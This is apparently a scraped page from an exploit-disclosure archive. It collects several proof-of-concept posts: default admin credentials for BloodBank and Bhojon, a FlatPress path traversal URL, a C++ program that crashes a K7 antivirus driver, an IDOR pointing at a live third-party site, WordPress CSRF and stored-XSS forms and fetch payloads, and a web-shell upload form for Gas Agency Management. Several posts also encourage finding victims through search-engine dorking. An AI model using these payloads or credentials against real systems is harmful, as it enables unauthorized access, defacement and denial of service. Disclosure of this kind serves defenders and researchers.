BloodBank version 1.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : BloodBank 1.1 Insecure Settings Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/bloodbank/                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/bloodbank/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

BloodBank 1.1 Insecure Settings

Bhojon Restaurant Management System version 2.9 suffers from an ignored default credential vulnerability.

**Bhojon Restaurant Management System 2.9 Insecure Settings**

Posted Aug 15, 2024

Authored by indoushka

Bhojon Restaurant Management System version 2.9 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | d6e06dde4900dda1d73c9d43d3fd7bdc675753e54128cdc173c7bd195c2bae96

Download | Favorite | View

**Bhojon Restaurant Management System 2.9 Insecure Settings**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v2.9 Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@example.com & pass = 12345[+] https://www/127.0.0.1/somrestocom/dashboard/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 2.9 Insecure Settings

FlatPress version 1.3.1 suffers from a path traversal vulnerability.

    =============================================================================================================================================| # Title     : FlatPress 1.3.1 Path Validation Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://github.com/flatpressblog/flatpress/archive/1.3.1.zip                                                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : /flatpress-1.3.1/fp-includes/core/core.config.php    if ($fullpath[0] != '/')    trigger_error('config_read: syntax error. Path must begin with a /');  [+] This line checks if the path starts with /. If it doesn’t, it triggers an error using trigger_error.     While this is valid, it might be better to use an InvalidArgumentException for more robust error handling.[+] use payload : /fp-includes/core/core.config.php/path=../../../../../fp-content/users/[+] http://127.0.0.1/flatpress-1.3.1/fp-includes/core/core.config.php/path=../../../../../fp-content/users/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

FlatPress 1.3.1 Path Traversal

In K7 Ultimate Security versions prior to 17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of a null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.

    # Title:  K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference  # Date: 13.08.2024# Author: M. Akil Gündoğan # Vendor Homepage: https://k7computing.com/# Version: < v17.0.2019# Tested on: Windows 10 Pro x64# CVE ID: CVE-2024-36424# Vulnerability Description:--------------------------------------In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.# Technical details and step by step Proof of Concept's (PoC):--------------------------------------1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.2 - Compile the attached PoC code written in C++ as release on VS 2022. 3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.# Impact:--------------------------------------An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.# Advisories:--------------------------------------K7 Computing recommends that all customers update their products to the corresponding versions shown below:K7 Ultimate Security (17.0.2019 or Higher)# Timeline:--------------------------------------- 16.05.2024 - Vulnerability reported.- 05.08.2024 - Vendor has fixed the vulnerability.- 13.08.2024 - Released.# References:--------------------------------------- Vendor: https://www.k7computing.com- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424- Repository: https://github.com/secunnix/CVE-2024-36424# PoC Code (C++):-------------------------------------------------------------------------------------------------------------------------/*# Usage: Only compile it and run, boooom :)*/#include <windows.h>#include <iostream>const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link pathconst DWORD ioCTL = 0x222010;  // IOCTL 0x222010 or 0x222014int main() {    std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;    HANDLE hDevice = CreateFile(driverDevice.c_str(),        GENERIC_READ | GENERIC_WRITE,        0,        nullptr,        OPEN_EXISTING,        0,        nullptr);    if (hDevice == INVALID_HANDLE_VALUE) {        std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;        return 1;    }    void* inputBuffer = nullptr; // Null input buffer    DWORD inputBufferSize = 0;    DWORD bytesReturned;    BOOL result = DeviceIoControl(hDevice,        ioCTL,        inputBuffer,        inputBufferSize,        nullptr,        0,        &bytesReturned,        nullptr);    if (!result) {        std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;    }    CloseHandle(hDevice);    return 0;}

K7 Ultimate Security NULL Pointer Dereference

Kortex version 1.0 suffers from an insecure direct object reference vulnerability.

**Kortex 1.0 Insecure Direct Object Reference**

Posted Aug 14, 2024

Authored by indoushka

Kortex version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | b5387d8bfce8e3033d7413641e3e9b7894ff5bafea17fd748b642abf24fa1ae8

Download | Favorite | View

**Kortex 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Kortex v1.0 IDOR Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.mayurik.com/source-code/P5339/best-free-law-office-management-software                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /control/data-table.php[+] https://www/ahmedshawki2110.freewebhostmost.com/control/data-table.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,399)
*   Arbitrary (16,878)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,813)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,082)
*   Encryption (2,389)
*   Exploit (53,197)
*   File Inclusion (4,262)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,220)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,725)
*   Python (1,641)
*   Remote (31,657)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,987)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,254)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,099)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,756)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,521)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,747)
*   UNIX (9,436)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Kortex 1.0 Insecure Direct Object Reference

WordPress MapFig Studio plugin versions 0.2.1 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/# Version: <= 0.2.1# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF check in some places, and is missingsanitisation as well as escaping, which could allow attackers to makelogged in admin add Stored XSS payloads via a CSRF attackProof of ConceptHave a logged in admin open a page containing:<html>  <body>    <form action="http://example.com/wp-admin/admin.php?page=studio_settings"method="POST">      <input type="hidden" name="studio_apikey"value=""><script>alert(1)</script>" />      <input type="hidden" name="studio_url"value=""><script>alert(1)</script>" />      <input type="hidden" name="save" value="Save!" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/

WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting

WordPress Profilepro plugin versions 1.3 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/profilepro/# Version: <= 1.3# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not sanitise and escape some parameters and lacks properaccess controls, which could allow users with a role as low as subscriberto perform Cross-Site Scripting attacksProof of ConceptRun the following code from the browser console from the subscriber user```fetch("../wp-admin/admin-ajax.php", {  method: "POST",  headers: {    "Accept": "*/*",    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",    "X-Requested-With": "XMLHttpRequest"  },  body:"title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",  credentials: "include"}).then(response => {  if (!response.ok) {    throw new Error('Network response was not ok');  }  return response.text();}).then(data => console.log(data)).catch(error => console.error('Error:', error));```- As an admin, go tohttp://example.com/wp-admin/edit.php?post_type=profilepro_form- Choose the default profile, click on edit and click on add field, XSSwill pop up.Reference:https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/

WordPress Profilepro 1.3 Cross Site Scripting

WordPress Light Poll plugin versions 1.0.0 and below suffer from multiple cross site request forgery vulnerabilities.

    # Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF checks when deleting polls, which could allowattackers to make logged in users perform such action via a CSRF attackProof of Concept<html>  <body>    <form action="http://localhost/wp-admin/admin.php">      <input type="hidden" name="page" value="lp_settings" />      <input type="hidden" name="task" value="remove" />      <input type="hidden" name="id" value="1" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF checks in some places, which could allowattackers to make logged in users perform unwanted actions via CSRF attacksProof of ConceptWhere <<POLL_ID>> and <<ANSWER_ID>> are valid:https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=<<POLL_ID>>&answer_id=<<ANSWER_ID>>Reference:https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/

WordPress Light Poll 1.0.0 Cross Site Request Forgery

WordPress PVN Auth Popup plugin version 1.0.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: PVN Auth Popup <= 1.0.0 - Admin+ Stored XSS# Date: 08-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/pvn-auth-popup/# Version: <= 1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not sanitise and escape some of its settings, which couldallow high privilege users such as admin to perform Stored Cross-SiteScripting attacks even when the unfiltered_html capability is disallowed(for example in multisite setup)Proof of Concept1. Go to https://example.com/wp-admin/admin.php?page=pvn_auth_popup2. In the first section, enter the payload `"><script>alert(1)</script>`for the "Login text" input3. Save and see the XSSNote: Other fields are likely vulnerableReference:https://wpscan.com/vulnerability/24685b19-0a44-411a-9e1b-d4d0627d7cb6/

WordPress PVN Auth Popup 1.0.0 Cross Site Scripting

Gas Agency Management version 2022 suffers from a remote shell upload vulnerability.

=============================================================================================================================================  
| # Title     : Gas Agency Management 2022 Remote File Upload Vulnerability                                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] infected file : gasmark/manage_website.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="ar">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushak was here</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/gasmark/manage_website.php" method="POST" enctype="multipart/form-data">  
               <input type="hidden" name="old_website_image" value="old_website_image.jpg">  
        <label for="website_image">S0M3 ThING baD:</label>  
        <input type="file" name="website_image" id="website_image"><br><br>

        <input type="submit" name="btn_web" value="do !T">  
    </form>  
</body>  
</html>

[+] Path : http://127.0.0.1/gasmark/assets/uploadImage/Logo/ev!l.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Tag

#php